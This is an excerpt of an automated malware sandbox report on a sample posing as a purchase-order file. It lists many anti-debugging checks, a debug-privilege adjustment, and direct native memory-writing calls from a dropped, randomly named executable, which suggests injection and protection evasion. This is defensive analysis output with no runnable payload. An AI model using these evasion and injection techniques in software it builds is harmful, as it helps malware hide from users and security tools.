                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B273C mov eax, dword ptr fs:[00000030h]4_2_019B273C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B273C mov ecx, dword ptr fs:[00000030h]4_2_019B273C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B273C mov eax, dword ptr fs:[00000030h]4_2_019B273C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FC730 mov eax, dword ptr fs:[00000030h]4_2_019FC730
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC720 mov eax, dword ptr fs:[00000030h]4_2_019BC720
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC720 mov eax, dword ptr fs:[00000030h]4_2_019BC720
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980750 mov eax, dword ptr fs:[00000030h]4_2_01980750
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2750 mov eax, dword ptr fs:[00000030h]4_2_019C2750
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2750 mov eax, dword ptr fs:[00000030h]4_2_019C2750
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B674D mov esi, dword ptr fs:[00000030h]4_2_019B674D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B674D mov eax, dword ptr fs:[00000030h]4_2_019B674D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B674D mov eax, dword ptr fs:[00000030h]4_2_019B674D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988770 mov eax, dword ptr fs:[00000030h]4_2_01988770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A04755 mov eax, dword ptr fs:[00000030h]4_2_01A04755
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0E75D mov eax, dword ptr fs:[00000030h]4_2_01A0E75D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984690 mov eax, dword ptr fs:[00000030h]4_2_01984690
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984690 mov eax, dword ptr fs:[00000030h]4_2_01984690
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B66B0 mov eax, dword ptr fs:[00000030h]4_2_019B66B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC6A6 mov eax, dword ptr fs:[00000030h]4_2_019BC6A6
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A006F1 mov eax, dword ptr fs:[00000030h]4_2_01A006F1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A006F1 mov eax, dword ptr fs:[00000030h]4_2_01A006F1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA6C7 mov ebx, dword ptr fs:[00000030h]4_2_019BA6C7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA6C7 mov eax, dword ptr fs:[00000030h]4_2_019BA6C7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE6F2 mov eax, dword ptr fs:[00000030h]4_2_019FE6F2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE6F2 mov eax, dword ptr fs:[00000030h]4_2_019FE6F2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE6F2 mov eax, dword ptr fs:[00000030h]4_2_019FE6F2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE6F2 mov eax, dword ptr fs:[00000030h]4_2_019FE6F2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2619 mov eax, dword ptr fs:[00000030h]4_2_019C2619
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE609 mov eax, dword ptr fs:[00000030h]4_2_019FE609
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198262C mov eax, dword ptr fs:[00000030h]4_2_0198262C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B6620 mov eax, dword ptr fs:[00000030h]4_2_019B6620
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B8620 mov eax, dword ptr fs:[00000030h]4_2_019B8620
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199E627 mov eax, dword ptr fs:[00000030h]4_2_0199E627
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4866E mov eax, dword ptr fs:[00000030h]4_2_01A4866E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4866E mov eax, dword ptr fs:[00000030h]4_2_01A4866E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199C640 mov eax, dword ptr fs:[00000030h]4_2_0199C640
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B2674 mov eax, dword ptr fs:[00000030h]4_2_019B2674
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA660 mov eax, dword ptr fs:[00000030h]4_2_019BA660
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA660 mov eax, dword ptr fs:[00000030h]4_2_019BA660
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A089B3 mov esi, dword ptr fs:[00000030h]4_2_01A089B3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A089B3 mov eax, dword ptr fs:[00000030h]4_2_01A089B3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A089B3 mov eax, dword ptr fs:[00000030h]4_2_01A089B3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019809AD mov eax, dword ptr fs:[00000030h]4_2_019809AD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019809AD mov eax, dword ptr fs:[00000030h]4_2_019809AD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0E9E0 mov eax, dword ptr fs:[00000030h]4_2_01A0E9E0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B49D0 mov eax, dword ptr fs:[00000030h]4_2_019B49D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A169C0 mov eax, dword ptr fs:[00000030h]4_2_01A169C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B29F9 mov eax, dword ptr fs:[00000030h]4_2_019B29F9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B29F9 mov eax, dword ptr fs:[00000030h]4_2_019B29F9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4A9D3 mov eax, dword ptr fs:[00000030h]4_2_01A4A9D3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0892A mov eax, dword ptr fs:[00000030h]4_2_01A0892A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A1892B mov eax, dword ptr fs:[00000030h]4_2_01A1892B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01978918 mov eax, dword ptr fs:[00000030h]4_2_01978918
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01978918 mov eax, dword ptr fs:[00000030h]4_2_01978918
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE908 mov eax, dword ptr fs:[00000030h]4_2_019FE908
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE908 mov eax, dword ptr fs:[00000030h]4_2_019FE908
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0C912 mov eax, dword ptr fs:[00000030h]4_2_01A0C912
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A24978 mov eax, dword ptr fs:[00000030h]4_2_01A24978
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A24978 mov eax, dword ptr fs:[00000030h]4_2_01A24978
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0C97C mov eax, dword ptr fs:[00000030h]4_2_01A0C97C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A00946 mov eax, dword ptr fs:[00000030h]4_2_01A00946
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C096E mov eax, dword ptr fs:[00000030h]4_2_019C096E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C096E mov edx, dword ptr fs:[00000030h]4_2_019C096E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C096E mov eax, dword ptr fs:[00000030h]4_2_019C096E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A6962 mov eax, dword ptr fs:[00000030h]4_2_019A6962
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A6962 mov eax, dword ptr fs:[00000030h]4_2_019A6962
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A6962 mov eax, dword ptr fs:[00000030h]4_2_019A6962
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980887 mov eax, dword ptr fs:[00000030h]4_2_01980887
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0C89D mov eax, dword ptr fs:[00000030h]4_2_01A0C89D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4A8E4 mov eax, dword ptr fs:[00000030h]4_2_01A4A8E4
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE8C0 mov eax, dword ptr fs:[00000030h]4_2_019AE8C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC8F9 mov eax, dword ptr fs:[00000030h]4_2_019BC8F9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC8F9 mov eax, dword ptr fs:[00000030h]4_2_019BC8F9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A508C0 mov eax, dword ptr fs:[00000030h]4_2_01A508C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2483A mov eax, dword ptr fs:[00000030h]4_2_01A2483A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2483A mov eax, dword ptr fs:[00000030h]4_2_01A2483A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA830 mov eax, dword ptr fs:[00000030h]4_2_019BA830
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov eax, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov eax, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov eax, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov ecx, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov eax, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov eax, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0C810 mov eax, dword ptr fs:[00000030h]4_2_01A0C810
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984859 mov eax, dword ptr fs:[00000030h]4_2_01984859
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984859 mov eax, dword ptr fs:[00000030h]4_2_01984859
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B0854 mov eax, dword ptr fs:[00000030h]4_2_019B0854
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A16870 mov eax, dword ptr fs:[00000030h]4_2_01A16870
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A16870 mov eax, dword ptr fs:[00000030h]4_2_01A16870
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0E872 mov eax, dword ptr fs:[00000030h]4_2_01A0E872
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0E872 mov eax, dword ptr fs:[00000030h]4_2_01A0E872
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01992840 mov ecx, dword ptr fs:[00000030h]4_2_01992840
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A34BB0 mov eax, dword ptr fs:[00000030h]4_2_01A34BB0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A34BB0 mov eax, dword ptr fs:[00000030h]4_2_01A34BB0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990BBE mov eax, dword ptr fs:[00000030h]4_2_01990BBE
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990BBE mov eax, dword ptr fs:[00000030h]4_2_01990BBE
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0CBF0 mov eax, dword ptr fs:[00000030h]4_2_01A0CBF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A0BCB mov eax, dword ptr fs:[00000030h]4_2_019A0BCB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A0BCB mov eax, dword ptr fs:[00000030h]4_2_019A0BCB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A0BCB mov eax, dword ptr fs:[00000030h]4_2_019A0BCB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980BCD mov eax, dword ptr fs:[00000030h]4_2_01980BCD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980BCD mov eax, dword ptr fs:[00000030h]4_2_01980BCD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980BCD mov eax, dword ptr fs:[00000030h]4_2_01980BCD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AEBFC mov eax, dword ptr fs:[00000030h]4_2_019AEBFC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988BF0 mov eax, dword ptr fs:[00000030h]4_2_01988BF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988BF0 mov eax, dword ptr fs:[00000030h]4_2_01988BF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988BF0 mov eax, dword ptr fs:[00000030h]4_2_01988BF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2EBD0 mov eax, dword ptr fs:[00000030h]4_2_01A2EBD0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A48B28 mov eax, dword ptr fs:[00000030h]4_2_01A48B28
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A48B28 mov eax, dword ptr fs:[00000030h]4_2_01A48B28
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AEB20 mov eax, dword ptr fs:[00000030h]4_2_019AEB20
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AEB20 mov eax, dword ptr fs:[00000030h]4_2_019AEB20
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A28B42 mov eax, dword ptr fs:[00000030h]4_2_01A28B42
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A16B40 mov eax, dword ptr fs:[00000030h]4_2_01A16B40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A16B40 mov eax, dword ptr fs:[00000030h]4_2_01A16B40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4AB40 mov eax, dword ptr fs:[00000030h]4_2_01A4AB40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A34B4B mov eax, dword ptr fs:[00000030h]4_2_01A34B4B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A34B4B mov eax, dword ptr fs:[00000030h]4_2_01A34B4B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197CB7E mov eax, dword ptr fs:[00000030h]4_2_0197CB7E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2EB50 mov eax, dword ptr fs:[00000030h]4_2_01A2EB50
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B8A90 mov edx, dword ptr fs:[00000030h]4_2_019B8A90
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A54A80 mov eax, dword ptr fs:[00000030h]4_2_01A54A80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988AA0 mov eax, dword ptr fs:[00000030h]4_2_01988AA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988AA0 mov eax, dword ptr fs:[00000030h]4_2_01988AA0
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019D6AA4 mov eax, dword ptr fs:[00000030h] | 4_2_019D6AA4
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_01980AD0 mov eax, dword ptr fs:[00000030h] | 4_2_01980AD0
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019B4AD0 mov eax, dword ptr fs:[00000030h] | 4_2_019B4AD0
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019D6ACC mov eax, dword ptr fs:[00000030h] | 4_2_019D6ACC
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019BAAEE mov eax, dword ptr fs:[00000030h] | 4_2_019BAAEE
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019A4A35 mov eax, dword ptr fs:[00000030h] | 4_2_019A4A35
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_01A0CA11 mov eax, dword ptr fs:[00000030h] | 4_2_01A0CA11
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019AEA2E mov eax, dword ptr fs:[00000030h] | 4_2_019AEA2E
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019BCA24 mov eax, dword ptr fs:[00000030h] | 4_2_019BCA24
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_01990A5B mov eax, dword ptr fs:[00000030h] | 4_2_01990A5B
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_01A2EA60 mov eax, dword ptr fs:[00000030h] | 4_2_01A2EA60
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_01986A50 mov eax, dword ptr fs:[00000030h] | 4_2_01986A50
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019FCA72 mov eax, dword ptr fs:[00000030h] | 4_2_019FCA72
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019BCA6F mov eax, dword ptr fs:[00000030h] | 4_2_019BCA6F
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_01A54DAD mov eax, dword ptr fs:[00000030h] | 4_2_01A54DAD
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_01A48DAE mov eax, dword ptr fs:[00000030h] | 4_2_01A48DAE
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019A8DBF mov eax, dword ptr fs:[00000030h] | 4_2_019A8DBF
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019BCDB1 mov ecx, dword ptr fs:[00000030h] | 4_2_019BCDB1
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019BCDB1 mov eax, dword ptr fs:[00000030h] | 4_2_019BCDB1
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtSetInformationThread: Direct from: 0x76F02B4C
